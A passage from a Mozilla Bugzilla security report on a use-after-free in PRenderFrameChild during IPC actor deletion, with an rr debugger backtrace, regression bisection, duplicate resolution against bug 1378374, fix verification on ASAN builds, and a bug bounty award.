#3 0x00007f8fcfcb124b in mozilla::layout::PRenderFrameChild::Send__delete__ (actor=0x604000146e50) at ipc/ipdl/PRenderFrameChild.cpp:65
65 IPC::Message* msg__ = PRenderFrame::Msg___delete__((actor)->Id());
(rr) p/x *actor
$4 = {
<mozilla::ipc::IProtocol> = {
<mozilla::ipc::HasResultCodes> = {<No data fields>},
members of mozilla::ipc::IProtocol:
_vptr$IProtocol = 0x7f8f7f0000a2,
static kNullActorId = 0x0,
static kFreedActorId = 0x1,
mId = 0x1,
mSide = 0x1,
mManager = 0x6190006edce0,
mChannel = 0x61d0000173a8
},
members of mozilla::layout::PRenderFrameChild:
mState = 0x1
}
(rr) rc
Thread 1 hit Hardware watchpoint 2: -location actor->mId
Old value = 1
New value = -9
0x00007f8fcf8f64fe in mozilla::ipc::IProtocol::Unregister (this=0x604000146e50, aId=-9) at ipc/glue/ProtocolUtils.cpp:432
432 mId = kFreedActorId;
(rr) bt 24
#0 0x00007f8fcf8f64fe in mozilla::ipc::IProtocol::Unregister (this=0x604000146e50, aId=-9) at ipc/glue/ProtocolUtils.cpp:432
#1 0x00007f8fcfcb15a4 in mozilla::layout::PRenderFrameChild::DestroySubtree (this=0x604000146e50, why=mozilla::ipc::IProtocol::AncestorDeletion) at ipc/ipdl/PRenderFrameChild.cpp:138
#2 0x00007f8fcfe843d8 in mozilla::dom::PBrowserChild::DestroySubtree (this=<optimized out>, why=mozilla::ipc::IProtocol::Deletion) at ipc/ipdl/PBrowserChild.cpp:4974
#3 0x00007f8fcfe83cf0 in mozilla::dom::PBrowserChild::Send__delete__ (actor=0x6190006edce0) at ipc/ipdl/PBrowserChild.cpp:1933
#4 0x00007f8fd3360579 in mozilla::dom::TabChild::DelayedDeleteRunnable::Run (this=<optimized out>) at dom/ipc/TabChild.cpp:327
#5 0x00007f8fceeb3dfe in nsThread::ProcessNextEvent (this=<optimized out>, aMayWait=<error reading variable: access outside bounds of object referenced via synthetic pointer>, aResult=0x7ffdea61aea0) at xpcom/threads/nsThread.cpp:1437
#6 0x00007f8fceeb6f61 in NS_ProcessNextEvent (aThread=0x61400000ca40, aMayWait=<error reading variable: access outside bounds of object referenced via synthetic pointer>) at xpcom/threads/nsThreadUtils.cpp:489
#7 0x00007f8fd36f65ad in mozilla::SpinEventLoopUntil<(mozilla::ProcessFailureBehavior)1, mozilla::dom::XMLHttpRequestMainThread::SendInternal(mozilla::dom::BodyExtractorBase const*)::$_0>(mozilla::dom::XMLHttpRequestMainThread::SendInternal(mozilla::dom::BodyExtractorBase const*)::$_0&&, nsIThread*) (aPredicate=<optimized out>, aThread=<optimized out>) at dist/include/nsThreadUtils.h:323
#8 0x00007f8fd36f4db4 in mozilla::dom::XMLHttpRequestMainThread::SendInternal (this=<optimized out>, aBody=0x7ffd00000002) at dom/xhr/XMLHttpRequestMainThread.cpp:3088
#9 0x00007f8fd370cae2 in mozilla::dom::XMLHttpRequestMainThread::Send (this=0x6170000b4480, aCx=0x7ffdea61bc10, aString=..., aRv=...) at dom/xhr/XMLHttpRequestMainThread.h:379
#10 0x00007f8fd1d7b845 in mozilla::dom::XMLHttpRequestBinding::send (cx=0x61d00003fc80, obj=..., self=0x6170000b4480, args=...) at dom/bindings/XMLHttpRequestBinding.cpp:783
#11 0x00007f8fd23f701b in mozilla::dom::GenericBindingMethod (cx=0x61d00003fc80, argc=<optimized out>, vp=<optimized out>) at dom/bindings/BindingUtils.cpp:3028
#12 0x00007f8fd669cd1b in js::CallJSNative (cx=0x61d00003fc80, native=0x7f8fd23f6c10 <mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*)>, args=...) at js/src/jscntxtinlines.h:293
#13 js::InternalCallOrConstruct (cx=0x61d00003fc80, args=..., construct=js::NO_CONSTRUCT) at js/src/vm/Interpreter.cpp:470
#14 0x00007f8fd669d14f in InternalCall (cx=0x61d00003fc80, args=...) at js/src/vm/Interpreter.cpp:515
#15 0x00007f8fd668be8b in Interpret (cx=0x604000146e58, state=...) at js/src/vm/Interpreter.cpp:3060
#16 0x00007f8fd667e153 in js::RunScript (cx=<optimized out>, state=...) at js/src/vm/Interpreter.cpp:410
#17 0x00007f8fd669cb37 in js::InternalCallOrConstruct (cx=0x604000146e58, args=..., construct=js::NO_CONSTRUCT) at js/src/vm/Interpreter.cpp:488
#18 0x00007f8fd669d14f in InternalCall (cx=0x61d00003fc80, args=...) at js/src/vm/Interpreter.cpp:515
#19 0x00007f8fd669d322 in js::Call (cx=0x61d00003fc80, fval=..., thisv=..., args=..., rval=...) at js/src/vm/Interpreter.cpp:534
#20 0x00007f8fd6cfa250 in JS::Call (cx=0x61d00003fc80, thisv=..., fval=..., args=..., rval=...) at js/src/jsapi.cpp:2948Severity: normal → critical
|
|
||
Comment 4•7 years ago
|
||
I have no clue who handles PRenderFrameChild bugs. Web Painting maybe? Feel free to re-assign if not.
Component: Layout → Layout: Web Painting
Keywords: csectype-uaf
|
||
Comment 5•7 years ago
|
||
Probably belongs in graphics:layers, based on the two most recent tweaks to RenderFrameChild.h (bug 1056427, bug 1103107). nical, would you be the right person to look into this maybe? (Or, do you know who else might know about the lifetime of PRenderFrameChild?)
Component: Layout: Web Painting → Graphics: Layers
Flags: needinfo?(nical.bugzilla)
|
||
Comment 6•7 years ago
|
||
I am not very well versed in the arcane of the PContent and PTab protocols, but the rr stack Mats collected with the stack of teh crash give a good indication that the problem was introduced through the nested event loop from bug 1343728. Something caused the PRenderFrameChild to be deleted from within the nested event loop (looks like it's destruction of the managing protocol) which apparently isn't expected by the code that tries to delete it again right after the end of the nested event loop under certain conditions. I suppose that this could be hacked around by reference counting the RenderFrameChild and delaying the actual deletion to when the refcount gets to zero in addition to whatever originally triggers its destruction.
Flags: needinfo?(nical.bugzilla) → needinfo?(michael)
|
||
Comment 7•7 years ago
|
||
This is the same as bug 1378374 I think.
Status: NEW → RESOLVED
Closed: 7 years ago
Flags: needinfo?(michael)
Resolution: --- → DUPLICATE
|
|
||
Updated•7 years ago
|
Component: Graphics: Layers → IPC
|
|
||
Comment 8•7 years ago
|
||
Since this is the older bug, and nominated for a bug bounty, I'd prefer not closing it "duplicate". If you think bug 1378374 has enough useful progress that you don't want to dupe the other way then let's at least make this "depends on" that one so we get the bounty award right when it's fixed.
|
||
Comment 10•7 years ago
|
||
I was able to bisect this with mozregression using testcase #2. INFO: Last good revision: 201b30adaf89493e1fdd200a4ce9172bb905a33d INFO: First bad revision: 1f83a9089442610aee9e2865cd6bc508bda35f11 INFO: Pushlog: https://hg.mozilla.org/integration/mozilla-inbound/pushloghtml?fromchange=201b30adaf89493e1fdd200a4ce9172bb905a33d&tochange=1f83a9089442610aee9e2865cd6bc508bda35f11 Bug 1374548 I guess?
Status: UNCONFIRMED → NEW
status-firefox54:
--- → unaffected
status-firefox55:
--- → unaffected
status-firefox56:
--- → affected
status-firefox-esr52:
--- → unaffected
Ever confirmed: true
Flags: needinfo?(hshih)
I think bug 1343728 is the actual regressor (based on the other bug).
Flags: needinfo?(hshih)
|
|
||
Comment 12•7 years ago
|
||
(In reply to Michael Layzell [:mystor] from comment #7) > This is the same as bug 1378374 I think. If true then this testcase should also be fixed. Nils, can you reproduce this testcase?
Flags: needinfo?(nils)
|
Reporter | |
Comment 13•7 years ago
|
||
Al, i can't reproduce on the latest ASAN build.
Flags: needinfo?(nils)
|
||
Comment 14•7 years ago
|
||
Dan, I suppose we can close this looking at comment 8 and comment 13?
Flags: needinfo?(dveditz)
|
|
||
Updated•7 years ago
|
Status: NEW → RESOLVED
Closed: 7 years ago → 7 years ago
Flags: needinfo?(dveditz)
Keywords: regression
Resolution: --- → FIXED
Whiteboard: fixed by bug 1378374
|
|
||
Updated•7 years ago
|
Group: layout-core-security → core-security-release
|
|
||
Updated•7 years ago
|
Flags: sec-bounty? → sec-bounty+
|
||
Updated•7 years ago
|
Flags: qe-verify+
Whiteboard: fixed by bug 1378374 → [post-critsmash-triage] fixed by bug 1378374
|
||
Comment 15•7 years ago
|
||
I've tried to reproduce this bug using a few affected asan builds (e.g. Nightly 56.0a1, 2017-07-04) but neither of the test cases, from comment 0 and comment 2 crashed on my Ubuntu 16.04 x64 LTS. Nils, I've seen you already verified this bug last month, do you think we are safe to close this bug as verified fixed per comment 13, since I wasn't able to reproduce the initial issue?
Flags: needinfo?(nils)
|
|
||
Updated•7 years ago
|
Group: core-security-release
|
||
Updated•7 years ago
|
Attachment #8909382 -
Attachment description: nils@vulndev.org,4000?,2017-07-04,2017-09-13,2017-09-18,true,,, → nils@vulndev.org,4000,2017-07-04,2017-09-13,2017-09-18,true,,,
You need to log in
before you can comment on or make changes to this bug.
Description
•